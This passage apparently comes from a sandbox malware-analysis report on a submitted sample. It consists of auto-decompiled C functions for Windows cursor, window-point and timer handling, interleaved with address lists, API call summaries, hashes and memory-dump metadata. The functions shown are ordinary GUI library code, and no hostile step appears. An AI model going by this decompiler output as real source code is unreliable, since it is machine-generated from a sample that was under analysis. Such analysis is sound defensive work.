					goto L47;
				}
				if(_t213 == 1) {
					E00407A50( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
					_t256 =  &_v20;
					_t304 = E00444404(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t304;
					if(_t304 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(__eflags != 0) {
						__eflags = _v20 - 2;
						if(_v20 != 2) {
							goto L47;
						}
						_t232 = PeekMessageA( &_v64, E00441704( *((intOrPtr*)(_v8 + 0x14))), 0x203, 0x203, 0);
						__eflags = _t232;
						if(_t232 == 0) {
							_t289 =  *0x437498; // 0x4374e4
							_t236 = E00403D78( *((intOrPtr*)(_t304 + 4)), _t289);
							__eflags = _t236;
							if(_t236 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 + 4)))) + 0xc4))();
							}
						}
						_t233 =  *((intOrPtr*)(_t304 + 4));
						__eflags =  *((char*)(_t233 + 0x9b)) - 1;
						if( *((char*)(_t233 + 0x9b)) == 1) {
							__eflags =  *((char*)(_t233 + 0x5d)) - 1;
							if( *((char*)(_t233 + 0x5d)) == 1) {
								E0043B624(_t233, _t256 | 0xffffffff, 0, _t306, _t315);
							}
						}
						goto L49;
					}
					E00445348(_v8,  &_v16, _t304, __eflags);
				} else {
				}
			}








































                                                                                                                                                                                                                            0x00445974
                                                                                                                                                                                                                            0x00445975
                                                                                                                                                                                                                            0x0044597c
                                                                                                                                                                                                                            0x0044597f
                                                                                                                                                                                                                            0x00445982
                                                                                                                                                                                                                            0x00445984
                                                                                                                                                                                                                            0x00445989
                                                                                                                                                                                                                            0x0044598a
                                                                                                                                                                                                                            0x0044598f
                                                                                                                                                                                                                            0x00445992
                                                                                                                                                                                                                            0x00445995
                                                                                                                                                                                                                            0x00445997
                                                                                                                                                                                                                            0x0044599c
                                                                                                                                                                                                                            0x004459c0
                                                                                                                                                                                                                            0x004459c0
                                                                                                                                                                                                                            0x004459c5
                                                                                                                                                                                                                            0x00445a46
                                                                                                                                                                                                                            0x00445a59
                                                                                                                                                                                                                            0x00445a5b
                                                                                                                                                                                                                            0x00445a5d
                                                                                                                                                                                                                            0x00445a63
                                                                                                                                                                                                                            0x00445a67
                                                                                                                                                                                                                            0x00445a6d
                                                                                                                                                                                                                            0x00445a71
                                                                                                                                                                                                                            0x00445a77
                                                                                                                                                                                                                            0x00445a85
                                                                                                                                                                                                                            0x00445a85
                                                                                                                                                                                                                            0x00445a71
                                                                                                                                                                                                                            0x00445a67
                                                                                                                                                                                                                            0x00445d21
                                                                                                                                                                                                                            0x00445d29
                                                                                                                                                                                                                            0x00445d33
                                                                                                                                                                                                                            0x00445d33
                                                                                                                                                                                                                            0x00445d36
                                                                                                                                                                                                                            0x00445d38
                                                                                                                                                                                                                            0x00445d3b
                                                                                                                                                                                                                            0x00445d3e
                                                                                                                                                                                                                            0x00445d4b
                                                                                                                                                                                                                            0x00445d4b
                                                                                                                                                                                                                            0x004459c7
                                                                                                                                                                                                                            0x004459c7
                                                                                                                                                                                                                            0x004459cc
                                                                                                                                                                                                                            0x00445c5f
                                                                                                                                                                                                                            0x00445c62
                                                                                                                                                                                                                            0x00445c66
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445c7d
                                                                                                                                                                                                                            0x00445c7f
                                                                                                                                                                                                                            0x00445c83
                                                                                                                                                                                                                            0x00445c95
                                                                                                                                                                                                                            0x00445c97
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445ca0
                                                                                                                                                                                                                            0x00445ca0
                                                                                                                                                                                                                            0x00445ca3
                                                                                                                                                                                                                            0x00445cae
                                                                                                                                                                                                                            0x00445cb3
                                                                                                                                                                                                                            0x00445cc2
                                                                                                                                                                                                                            0x00445ccc
                                                                                                                                                                                                                            0x00445cd7
                                                                                                                                                                                                                            0x00445ce7
                                                                                                                                                                                                                            0x00445cf7
                                                                                                                                                                                                                            0x00445cff
                                                                                                                                                                                                                            0x00445d0d
                                                                                                                                                                                                                            0x00445d1b
                                                                                                                                                                                                                            0x00445d1c
                                                                                                                                                                                                                            0x00445d1d
                                                                                                                                                                                                                            0x00445d1e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445d1e
                                                                                                                                                                                                                            0x00445ca5
                                                                                                                                                                                                                            0x00445ca8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445ca8
                                                                                                                                                                                                                            0x00445c8b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004459d2
                                                                                                                                                                                                                            0x004459d2
                                                                                                                                                                                                                            0x004459d5
                                                                                                                                                                                                                            0x004459db
                                                                                                                                                                                                                            0x004459de
                                                                                                                                                                                                                            0x004459e4
                                                                                                                                                                                                                            0x004459f3
                                                                                                                                                                                                                            0x004459f3
                                                                                                                                                                                                                            0x004459e4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004459d5
                                                                                                                                                                                                                            0x004459cc
                                                                                                                                                                                                                            0x0044599e
                                                                                                                                                                                                                            0x00445b42
                                                                                                                                                                                                                            0x00445b46
                                                                                                                                                                                                                            0x00445ba6
                                                                                                                                                                                                                            0x00445b48
                                                                                                                                                                                                                            0x00445b4e
                                                                                                                                                                                                                            0x00445b61
                                                                                                                                                                                                                            0x00445b63
                                                                                                                                                                                                                            0x00445b65
                                                                                                                                                                                                                            0x00445b6b
                                                                                                                                                                                                                            0x00445b6f
                                                                                                                                                                                                                            0x00445b75
                                                                                                                                                                                                                            0x00445b7a
                                                                                                                                                                                                                            0x00445b80
                                                                                                                                                                                                                            0x00445b85
                                                                                                                                                                                                                            0x00445b87
                                                                                                                                                                                                                            0x00445b99
                                                                                                                                                                                                                            0x00445b89
                                                                                                                                                                                                                            0x00445b8b
                                                                                                                                                                                                                            0x00445b8b
                                                                                                                                                                                                                            0x00445b87
                                                                                                                                                                                                                            0x00445b6f
                                                                                                                                                                                                                            0x00445b65
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445b46
                                                                                                                                                                                                                            0x004459a4
                                                                                                                                                                                                                            0x004459a7
                                                                                                                                                                                                                            0x00445bb4
                                                                                                                                                                                                                            0x00445bc5
                                                                                                                                                                                                                            0x00445bcd
                                                                                                                                                                                                                            0x00445bd3
                                                                                                                                                                                                                            0x00445bd6
                                                                                                                                                                                                                            0x00445bdb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445bec
                                                                                                                                                                                                                            0x00445bef
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445c00
                                                                                                                                                                                                                            0x00445c02
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445c16
                                                                                                                                                                                                                            0x00445c18
                                                                                                                                                                                                                            0x00445c1a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445c20
                                                                                                                                                                                                                            0x00445c24
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445c39
                                                                                                                                                                                                                            0x00445c46
                                                                                                                                                                                                                            0x00445c4b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445c4b
                                                                                                                                                                                                                            0x004459ad
                                                                                                                                                                                                                            0x004459b2
                                                                                                                                                                                                                            0x004459fd
                                                                                                                                                                                                                            0x00445a00
                                                                                                                                                                                                                            0x00445a04
                                                                                                                                                                                                                            0x00445a0d
                                                                                                                                                                                                                            0x00445a18
                                                                                                                                                                                                                            0x00445a1d
                                                                                                                                                                                                                            0x00445a23
                                                                                                                                                                                                                            0x00445a29
                                                                                                                                                                                                                            0x00445a2d
                                                                                                                                                                                                                            0x00445a36
                                                                                                                                                                                                                            0x00445a36
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445a04
                                                                                                                                                                                                                            0x004459b5
                                                                                                                                                                                                                            0x00445a95
                                                                                                                                                                                                                            0x00445a9a
                                                                                                                                                                                                                            0x00445aa8
                                                                                                                                                                                                                            0x00445aaa
                                                                                                                                                                                                                            0x00445aac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445ab2
                                                                                                                                                                                                                            0x00445ab6
                                                                                                                                                                                                                            0x00445aca
                                                                                                                                                                                                                            0x00445ace
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445af0
                                                                                                                                                                                                                            0x00445af5
                                                                                                                                                                                                                            0x00445af7
                                                                                                                                                                                                                            0x00445afc
                                                                                                                                                                                                                            0x00445b02
                                                                                                                                                                                                                            0x00445b07
                                                                                                                                                                                                                            0x00445b09
                                                                                                                                                                                                                            0x00445b10
                                                                                                                                                                                                                            0x00445b10
                                                                                                                                                                                                                            0x00445b09
                                                                                                                                                                                                                            0x00445b16
                                                                                                                                                                                                                            0x00445b19
                                                                                                                                                                                                                            0x00445b20
                                                                                                                                                                                                                            0x00445b26
                                                                                                                                                                                                                            0x00445b2a
                                                                                                                                                                                                                            0x00445b35
                                                                                                                                                                                                                            0x00445b35
                                                                                                                                                                                                                            0x00445b2a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445b20
                                                                                                                                                                                                                            0x00445ac0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004459bb

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00445BB4
                                                                                                                                                                                                                            • SetCursor.USER32(00000000,?,00000000,00445D4C), ref: 00445C46
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Cursor
                                                                                                                                                                                                                            • String ID: tC
                                                                                                                                                                                                                            • API String ID: 3268636600-1085749316
                                                                                                                                                                                                                            • Opcode ID: a178da6c9b4bbc368baccb1c65472ba58289c6c91f01dbbabba44e50dbd88129
                                                                                                                                                                                                                            • Instruction ID: 446e4450e0cf9451a988a13874b671d4eb8b623e4d71601eaa952d46317be944
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a178da6c9b4bbc368baccb1c65472ba58289c6c91f01dbbabba44e50dbd88129
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6C14E71E00609CFEF10DFA9C98999EB7B1AF48304F14856AE801AB356D738EE41CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045B640 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 282COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                            			E0045B640(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagPOINT _v32;
				char _v33;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				struct HWND__* _v52;
				intOrPtr _v56;
				char _v60;
				struct tagRECT _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				char _v100;
				struct tagRECT _v116;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				struct HWND__* _t130;
				struct HWND__* _t166;
				intOrPtr _t188;
				char _t194;
				intOrPtr _t218;
				intOrPtr _t222;
				void* _t238;
				intOrPtr* _t250;
				intOrPtr _t270;
				intOrPtr _t271;
				intOrPtr _t273;
				intOrPtr _t279;
				intOrPtr* _t306;
				intOrPtr _t307;
				void* _t314;

				_t313 = _t314;
				_push(__ebx);
				_push(__esi);
				_v144 = 0;
				_v148 = 0;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_t270 =  *0x451298; // 0x45129c
				E004053AC( &_v100, _t270);
				_t250 =  &_v8;
				_push(_t314);
				_push(0x45b9c6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t314 + 0xffffff70;
				 *((char*)( *_t250 + 0x58)) = 0;
				if( *((char*)( *_t250 + 0x88)) == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0 || E004517CC() == 0 || E00458E30(E00439828( &_v16, 1)) !=  *((intOrPtr*)( *_t250 + 0x60))) {
					L23:
					_t130 = _v52;
					__eflags = _t130;
					if(_t130 <= 0) {
						E0045B3A8( *_t250);
					} else {
						E0045B1B0( *_t250, 0, _t130);
					}
					goto L26;
				} else {
					_v100 =  *((intOrPtr*)( *_t250 + 0x60));
					_v92 = _v16;
					_v88 = _v12;
					_v88 = _v88 + E0045B3E0();
					_v84 = E004581F4();
					_v80 =  *((intOrPtr*)( *_t250 + 0x5c));
					E0043A91C( *((intOrPtr*)( *_t250 + 0x60)),  &_v132);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))();
					_v32.x = 0;
					_v32.y = 0;
					_t306 =  *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30));
					_t320 = _t306;
					if(_t306 == 0) {
						_t307 =  *((intOrPtr*)( *_t250 + 0x60));
						_t279 =  *0x437498; // 0x4374e4
						_t166 = E00403D78(_t307, _t279);
						__eflags = _t166;
						if(_t166 != 0) {
							__eflags =  *(_t307 + 0x190);
							if( *(_t307 + 0x190) != 0) {
								ClientToScreen( *(_t307 + 0x190),  &_v32);
							}
						}
					} else {
						 *((intOrPtr*)( *_t306 + 0x40))();
					}
					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
					E0043AAC0( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v16);
					_v60 = _v140;
					_v56 = _v136;
					E00458DF8( *((intOrPtr*)( *_t250 + 0x60)),  &_v148);
					E0043809C(_v148,  &_v140,  &_v144, _t320);
					E00404A58( &_v44, _v144);
					_v52 = 0;
					_v48 =  *((intOrPtr*)( *_t250 + 0x74));
					_t188 =  *0x49be64; // 0x437a1c
					_v96 = _t188;
					_v40 = 0;
					_v33 = E0043C130( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030,  &_v100) == 0;
					if(_v33 != 0 &&  *((short*)( *_t250 + 0x132)) != 0) {
						 *((intOrPtr*)( *_t250 + 0x130))( &_v100);
					}
					if(_v33 == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0) {
						_t194 = 0;
					} else {
						_t194 = 1;
					}
					_t285 =  *_t250;
					 *((char*)( *_t250 + 0x58)) = _t194;
					if( *((char*)( *_t250 + 0x58)) == 0) {
						goto L23;
					} else {
						_t327 = _v44;
						if(_v44 == 0) {
							goto L23;
						}
						E0045B534(_v96, _t285, _t313);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x70))();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd8))( &_v116, _v40);
						OffsetRect( &_v116, _v92, _v88);
						if(E00403DE8( *((intOrPtr*)( *_t250 + 0x84)), _t327) != 0) {
							_t238 = E0045B594(_v44, _t250, 0xffc8, _t313) + 5;
							_v116.left = _v116.left - _t238;
							_v116.right = _v116.right - _t238;
						}
						E0043AA94( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v76);
						_t218 =  *_t250;
						 *((intOrPtr*)(_t218 + 0x64)) = _v140;
						 *((intOrPtr*)(_t218 + 0x68)) = _v136;
						E0043AA94( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &(_v76.right));
						_t222 =  *_t250;
						 *((intOrPtr*)(_t222 + 0x6c)) = _v140;
						 *((intOrPtr*)(_t222 + 0x70)) = _v136;
						E0043B11C( *((intOrPtr*)( *_t250 + 0x84)), _v80);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd4))(_v40);
						E00458F44(_v44);
						_t231 = _v52;
						if(_v52 <= 0) {
							E0045B1B0( *_t250, 1, _v48);
						} else {
							E0045B1B0( *_t250, 0, _t231);
						}
						L26:
						_pop(_t271);
						 *[fs:eax] = _t271;
						_push(0x45b9cd);
						E004049E4( &_v148, 2);
						_t273 =  *0x451298; // 0x45129c
						return E0040547C( &_v100, _t273);
					}
				}
			}












































                                                                                                                                                                                                                            0x0045b641
                                                                                                                                                                                                                            0x0045b649
                                                                                                                                                                                                                            0x0045b64a
                                                                                                                                                                                                                            0x0045b64e
                                                                                                                                                                                                                            0x0045b654
                                                                                                                                                                                                                            0x0045b65f
                                                                                                                                                                                                                            0x0045b660
                                                                                                                                                                                                                            0x0045b661
                                                                                                                                                                                                                            0x0045b667
                                                                                                                                                                                                                            0x0045b66d
                                                                                                                                                                                                                            0x0045b672
                                                                                                                                                                                                                            0x0045b677
                                                                                                                                                                                                                            0x0045b678
                                                                                                                                                                                                                            0x0045b67d
                                                                                                                                                                                                                            0x0045b680
                                                                                                                                                                                                                            0x0045b685
                                                                                                                                                                                                                            0x0045b692
                                                                                                                                                                                                                            0x0045b97f
                                                                                                                                                                                                                            0x0045b97f
                                                                                                                                                                                                                            0x0045b982
                                                                                                                                                                                                                            0x0045b984
                                                                                                                                                                                                                            0x0045b995
                                                                                                                                                                                                                            0x0045b986
                                                                                                                                                                                                                            0x0045b98c
                                                                                                                                                                                                                            0x0045b98c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045b6cb
                                                                                                                                                                                                                            0x0045b6d0
                                                                                                                                                                                                                            0x0045b6d6
                                                                                                                                                                                                                            0x0045b6dc
                                                                                                                                                                                                                            0x0045b6e4
                                                                                                                                                                                                                            0x0045b6f1
                                                                                                                                                                                                                            0x0045b6f9
                                                                                                                                                                                                                            0x0045b704
                                                                                                                                                                                                                            0x0045b70f
                                                                                                                                                                                                                            0x0045b710
                                                                                                                                                                                                                            0x0045b711
                                                                                                                                                                                                                            0x0045b712
                                                                                                                                                                                                                            0x0045b71d
                                                                                                                                                                                                                            0x0045b722
                                                                                                                                                                                                                            0x0045b727
                                                                                                                                                                                                                            0x0045b72f
                                                                                                                                                                                                                            0x0045b732
                                                                                                                                                                                                                            0x0045b734
                                                                                                                                                                                                                            0x0045b744
                                                                                                                                                                                                                            0x0045b749
                                                                                                                                                                                                                            0x0045b74f
                                                                                                                                                                                                                            0x0045b754
                                                                                                                                                                                                                            0x0045b756
                                                                                                                                                                                                                            0x0045b758
                                                                                                                                                                                                                            0x0045b75f
                                                                                                                                                                                                                            0x0045b76c
                                                                                                                                                                                                                            0x0045b76c
                                                                                                                                                                                                                            0x0045b75f
                                                                                                                                                                                                                            0x0045b736
                                                                                                                                                                                                                            0x0045b73d
                                                                                                                                                                                                                            0x0045b73d
                                                                                                                                                                                                                            0x0045b783
                                                                                                                                                                                                                            0x0045b796
                                                                                                                                                                                                                            0x0045b7a1
                                                                                                                                                                                                                            0x0045b7aa
                                                                                                                                                                                                                            0x0045b7b8
                                                                                                                                                                                                                            0x0045b7c9
                                                                                                                                                                                                                            0x0045b7d7
                                                                                                                                                                                                                            0x0045b7de
                                                                                                                                                                                                                            0x0045b7e6
                                                                                                                                                                                                                            0x0045b7e9
                                                                                                                                                                                                                            0x0045b7ee
                                                                                                                                                                                                                            0x0045b7f3
                                                                                                                                                                                                                            0x0045b80d
                                                                                                                                                                                                                            0x0045b815
                                                                                                                                                                                                                            0x0045b835
                                                                                                                                                                                                                            0x0045b835
                                                                                                                                                                                                                            0x0045b83f
                                                                                                                                                                                                                            0x0045b849
                                                                                                                                                                                                                            0x0045b84d
                                                                                                                                                                                                                            0x0045b84d
                                                                                                                                                                                                                            0x0045b84d
                                                                                                                                                                                                                            0x0045b84f
                                                                                                                                                                                                                            0x0045b851
                                                                                                                                                                                                                            0x0045b85a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045b860
                                                                                                                                                                                                                            0x0045b860
                                                                                                                                                                                                                            0x0045b864
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045b86e
                                                                                                                                                                                                                            0x0045b886
                                                                                                                                                                                                                            0x0045b8a1
                                                                                                                                                                                                                            0x0045b8b3
                                                                                                                                                                                                                            0x0045b8cb
                                                                                                                                                                                                                            0x0045b8d7
                                                                                                                                                                                                                            0x0045b8da
                                                                                                                                                                                                                            0x0045b8dd
                                                                                                                                                                                                                            0x0045b8dd
                                                                                                                                                                                                                            0x0045b8ee
                                                                                                                                                                                                                            0x0045b8f3
                                                                                                                                                                                                                            0x0045b8fb
                                                                                                                                                                                                                            0x0045b904
                                                                                                                                                                                                                            0x0045b915
                                                                                                                                                                                                                            0x0045b91a
                                                                                                                                                                                                                            0x0045b922
                                                                                                                                                                                                                            0x0045b92b
                                                                                                                                                                                                                            0x0045b939
                                                                                                                                                                                                                            0x0045b952
                                                                                                                                                                                                                            0x0045b958
                                                                                                                                                                                                                            0x0045b95d
                                                                                                                                                                                                                            0x0045b962
                                                                                                                                                                                                                            0x0045b978
                                                                                                                                                                                                                            0x0045b964
                                                                                                                                                                                                                            0x0045b96a
                                                                                                                                                                                                                            0x0045b96a
                                                                                                                                                                                                                            0x0045b99a
                                                                                                                                                                                                                            0x0045b99c
                                                                                                                                                                                                                            0x0045b99f
                                                                                                                                                                                                                            0x0045b9a2
                                                                                                                                                                                                                            0x0045b9b2
                                                                                                                                                                                                                            0x0045b9ba
                                                                                                                                                                                                                            0x0045b9c5
                                                                                                                                                                                                                            0x0045b9c5
                                                                                                                                                                                                                            0x0045b85a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004517CC: GetActiveWindow.USER32 ref: 004517CF
                                                                                                                                                                                                                              • Part of subcall function 004517CC: GetCurrentThreadId.KERNEL32 ref: 004517E4
                                                                                                                                                                                                                              • Part of subcall function 004517CC: 73C9AC10.USER32(00000000,004517AC), ref: 004517EA
                                                                                                                                                                                                                              • Part of subcall function 0045B3E0: GetCursor.USER32(?), ref: 0045B3FB
                                                                                                                                                                                                                              • Part of subcall function 0045B3E0: GetIconInfo.USER32(00000000,?), ref: 0045B401
                                                                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 0045B76C
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 0045B783
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 0045B8B3
                                                                                                                                                                                                                              • Part of subcall function 0045B1B0: SetTimer.USER32(00000000,00000000,?,00458E50), ref: 0045B1CA
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: OffsetRect$ActiveClientCurrentCursorIconInfoScreenThreadTimerWindow
                                                                                                                                                                                                                            • String ID: tC
                                                                                                                                                                                                                            • API String ID: 3022406661-1085749316
                                                                                                                                                                                                                            • Opcode ID: 3d652ba1a3436a72cfe8ea0ee2e08dc750de709dd5d5b2f6d499bfc4cb44fc42
                                                                                                                                                                                                                            • Instruction ID: 5094cc74829a0d0ddc56b95c8e280c0bc637037c8d8d66aa697b62fbdea552c2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d652ba1a3436a72cfe8ea0ee2e08dc750de709dd5d5b2f6d499bfc4cb44fc42
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FC1D675A006188FCB10EF68C485A9EB7F5FF49304F1440AAE905EB366DB34AD49CF95
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043BC7C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                            			E0043BC7C(void* __eax, intOrPtr __ecx, intOrPtr __edx, char _a4) {
				intOrPtr _v8;
				char _v9;
				intOrPtr _v16;
				struct tagPOINT _v32;
				intOrPtr _v36;
				long _v40;
				char _v56;
				void* __edi;
				void* __esi;
				struct HWND__* _t57;
				void* _t63;
				char _t84;
				struct HWND__* _t108;
				void* _t110;
				intOrPtr _t134;
				intOrPtr _t137;
				void* _t141;
				void* _t142;
				struct HWND__* _t143;
				struct HWND__* _t147;
				void* _t152;
				void* _t154;
				intOrPtr _t155;

				_t152 = _t154;
				_t155 = _t154 + 0xffffffcc;
				_push(_t142);
				_v8 = __ecx;
				_t137 = __edx;
				_t110 = __eax;
				if(__edx == 0 || __edx == 0xffffffff) {
					_t57 =  *(_t110 + 0xa0);
					if(_t57 == 0 ||  *((char*)(_t57 + 0x1a7)) == 0 ||  *((intOrPtr*)(_t57 + 0x17c)) == 0) {
						E004197DC( *((intOrPtr*)(_t110 + 0x40)),  &_v40,  *((intOrPtr*)(_t110 + 0x44)), _t137, _t142);
						_v32.x = _v40;
						_v32.y = _v36;
						_t143 =  *(_t110 + 0x30);
						__eflags = _t143;
						if(_t143 != 0) {
							E0043AA94(_t143,  &_v40,  &_v32);
							_v32.x = _v40;
							_v32.y = _v36;
						}
					} else {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x17c)))) + 0x14))();
						MapWindowPoints(E00441704( *(_t110 + 0xa0)), 0,  &_v32, 2);
					}
					_t63 = E0043AF0C(_t110);
					E0041982C(_v32.x, E0043AF20(_t110), _v32.y,  &_v56, _t63);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v9 = E0043BE5C(_t110,  &_v32);
					goto L20;
				} else {
					E0043C164(__eax);
					__eflags =  *(_t110 + 0xa0);
					if(__eflags == 0) {
						L12:
						_t84 = 1;
					} else {
						_t108 = E00403DE8( *(_t110 + 0xa0), __eflags);
						__eflags = _t108;
						if(_t108 != 0) {
							goto L12;
						} else {
							_t84 = 0;
						}
					}
					_v9 = _t84;
					__eflags = _v9;
					if(_v9 == 0) {
						L20:
						return _v9;
					} else {
						_v16 = E00438690(1, _t137);
						_push(_t152);
						_push(0x43be47);
						_push( *[fs:edx]);
						 *[fs:edx] = _t155;
						_t87 =  *(_t110 + 0xa0);
						__eflags =  *(_t110 + 0xa0);
						if( *(_t110 + 0xa0) == 0) {
							_t147 = 0;
							__eflags = 0;
						} else {
							_t147 = E00441704(_t87);
						}
						E0043A91C(_t110,  &_v32);
						__eflags = _t147;
						if(__eflags != 0) {
							MapWindowPoints(_t147, 0,  &_v32, 2);
						}
						 *((intOrPtr*)(_v16 + 4)) = _t137;
						 *((char*)(_v16 + 0x54)) = _a4;
						 *((intOrPtr*)(_v16 + 0x58)) = _v8;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t141 = _t137;
						MapWindowPoints(0, E00441704(_t141),  &_v32, 1);
						_push(_v32.y);
						E00403DE8(_t141, __eflags);
						__eflags = 0;
						_pop(_t134);
						 *[fs:eax] = _t134;
						_push(0x43be4e);
						return E00403BEC(_v16);
					}
				}
			}


























                                                                                                                                                                                                                            0x0043bc7d
                                                                                                                                                                                                                            0x0043bc7f
                                                                                                                                                                                                                            0x0043bc83
                                                                                                                                                                                                                            0x0043bc85
                                                                                                                                                                                                                            0x0043bc88
                                                                                                                                                                                                                            0x0043bc8a
                                                                                                                                                                                                                            0x0043bc8e
                                                                                                                                                                                                                            0x0043bc99
                                                                                                                                                                                                                            0x0043bca1
                                                                                                                                                                                                                            0x0043bce9
                                                                                                                                                                                                                            0x0043bcf1
                                                                                                                                                                                                                            0x0043bcf7
                                                                                                                                                                                                                            0x0043bcfa
                                                                                                                                                                                                                            0x0043bcfd
                                                                                                                                                                                                                            0x0043bcff
                                                                                                                                                                                                                            0x0043bd09
                                                                                                                                                                                                                            0x0043bd11
                                                                                                                                                                                                                            0x0043bd17
                                                                                                                                                                                                                            0x0043bd17
                                                                                                                                                                                                                            0x0043bcb5
